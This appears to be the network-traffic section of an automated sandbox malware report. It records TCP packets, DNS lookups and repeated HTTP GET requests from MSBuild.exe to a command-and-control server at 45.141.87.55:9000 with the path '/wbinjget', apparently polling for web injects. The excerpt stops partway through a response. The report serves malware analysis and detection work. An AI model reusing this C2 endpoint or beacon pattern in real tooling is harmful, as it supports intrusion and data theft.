                                                                                                          Nov 22, 2024 15:50:10.694720030 CET4434999213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:10.789772987 CET4434999313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:10.790218115 CET49993443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:10.790258884 CET4434999313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:10.790895939 CET49993443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:10.790910006 CET4434999313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:10.856806993 CET4434999013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:10.860091925 CET4434999013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:10.860153913 CET49990443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:10.860169888 CET4434999013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:10.860258102 CET49990443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:10.860352993 CET49990443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:10.860379934 CET4434999013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:10.860392094 CET49990443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:10.860399961 CET4434999013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:10.864366055 CET49995443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:10.864419937 CET4434999513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:10.864615917 CET49995443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:10.864839077 CET49995443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:10.864854097 CET4434999513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.051562071 CET4434999113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.054883957 CET4434999113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.055037975 CET49991443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.055630922 CET49991443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.055661917 CET4434999113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.055773020 CET49991443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.055779934 CET4434999113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.061958075 CET49996443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.062007904 CET4434999613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.062149048 CET49996443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.062756062 CET49996443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.062766075 CET4434999613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.138694048 CET4434999213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.138794899 CET4434999213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.138859987 CET49992443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.139163017 CET49992443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.139180899 CET4434999213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.139205933 CET49992443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.139210939 CET4434999213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.142632008 CET49997443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.142695904 CET4434999713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.142832041 CET49997443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.143188953 CET49997443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.143204927 CET4434999713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.245347023 CET4434999313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.245404959 CET4434999313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.245487928 CET49993443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.245518923 CET4434999313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.245981932 CET4434999313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.246155977 CET49993443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.246155977 CET49993443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.246155977 CET49993443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.248543024 CET49998443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.248595953 CET4434999813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.248682022 CET49998443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.249079943 CET49998443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.249097109 CET4434999813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.439192057 CET4434999413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.439687967 CET49994443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.439713955 CET4434999413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.440148115 CET49994443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.440154076 CET4434999413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.552445889 CET49993443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.552476883 CET4434999313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.886225939 CET4434999413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.886312962 CET4434999413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.886404991 CET49994443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.886671066 CET49994443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.886698008 CET4434999413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.886710882 CET49994443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.886718035 CET4434999413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.890042067 CET49999443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.890091896 CET4434999913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:11.890186071 CET49999443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.890429020 CET49999443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:11.890443087 CET4434999913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:12.657613039 CET4434999513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:12.658050060 CET49995443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:12.658082962 CET4434999513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:12.658540010 CET49995443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:12.658545017 CET4434999513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:12.868355036 CET4434999613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:12.868843079 CET49996443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:12.868861914 CET4434999613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:12.869601011 CET49996443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:12.869606018 CET4434999613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:12.960163116 CET4434999713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:12.960604906 CET49997443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:12.960642099 CET4434999713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:12.961034060 CET49997443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:12.961042881 CET4434999713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.105068922 CET4434999813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.105643988 CET49998443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.105673075 CET4434999813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.106240988 CET49998443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.106246948 CET4434999813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.108777046 CET4434999513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.108800888 CET4434999513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.108863115 CET49995443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.108887911 CET4434999513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.109124899 CET49995443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.109134912 CET4434999513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.109149933 CET49995443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.109283924 CET4434999513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.109313011 CET4434999513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.109355927 CET49995443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.112191916 CET50000443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.112220049 CET4435000013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.114242077 CET50000443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.114393950 CET50000443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.114401102 CET4435000013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.328736067 CET4434999613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.328768015 CET4434999613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.328854084 CET49996443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.328869104 CET4434999613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.328918934 CET49996443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.329205990 CET49996443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.329227924 CET4434999613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.329242945 CET49996443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.329250097 CET4434999613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.332459927 CET50001443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.332508087 CET4435000113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.332607985 CET50001443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.332782030 CET50001443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.332792044 CET4435000113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.403009892 CET4434999713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.403075933 CET4434999713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.403223991 CET49997443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.403265953 CET4434999713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.403526068 CET49997443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.403526068 CET49997443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.403547049 CET4434999713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.403925896 CET4434999713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.404012918 CET4434999713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.404062033 CET49997443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.406477928 CET50002443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.406532049 CET4435000213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.406598091 CET50002443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.406775951 CET50002443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.406786919 CET4435000213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.559602976 CET4434999813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.559634924 CET4434999813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.559706926 CET4434999813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.559705019 CET49998443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.562693119 CET49998443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.562728882 CET49998443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.562752008 CET4434999813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.562766075 CET49998443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.562773943 CET4434999813.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.565473080 CET50003443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.565519094 CET4435000313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.565599918 CET50003443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.565725088 CET50003443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.565735102 CET4435000313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.721647978 CET4434999913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.722208977 CET49999443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.722248077 CET4434999913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:50:13.722673893 CET49999443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:50:13.722687006 CET4434999913.107.246.63192.168.2.7

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Nov 22, 2024 15:48:08.328027964 CET6314553192.168.2.71.1.1.1

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Nov 22, 2024 15:48:08.328027964 CET192.168.2.71.1.1.10xf706Standard query (0)time.windows.comA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Nov 22, 2024 15:48:08.465611935 CET1.1.1.1192.168.2.70xf706No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Nov 22, 2024 15:48:14.362729073 CET1.1.1.1192.168.2.70xacd6No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Nov 22, 2024 15:48:14.362729073 CET1.1.1.1192.168.2.70xacd6No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                          Nov 22, 2024 15:48:40.487421036 CET1.1.1.1192.168.2.70xf475No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                          Nov 22, 2024 15:48:40.487421036 CET1.1.1.1192.168.2.70xf475No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • 45.141.87.55:9000

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.74979445.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:48:58.370776892 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:48:59.792915106 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:48:58 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.74979945.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:00.031955004 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:01.398513079 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:01 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.74980345.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:01.625916958 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:49:02.940120935 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:02 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.74980645.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:03.172724962 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:04.533087969 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:04 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.74981145.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:04.771308899 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:49:06.131850958 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:05 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.74981745.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:06.362011909 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:49:07.772088051 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:07 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.74982145.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:08.043570995 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:49:09.429534912 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:09 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.74982645.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:09.658163071 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:11.069500923 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:10 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.74983145.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:11.354548931 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:49:12.739933014 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:12 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.74983745.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:12.971493006 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:49:14.340859890 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:14 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.74984045.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:14.623420954 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:49:15.972464085 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:15 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.74984545.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:16.203820944 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:49:17.584692001 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
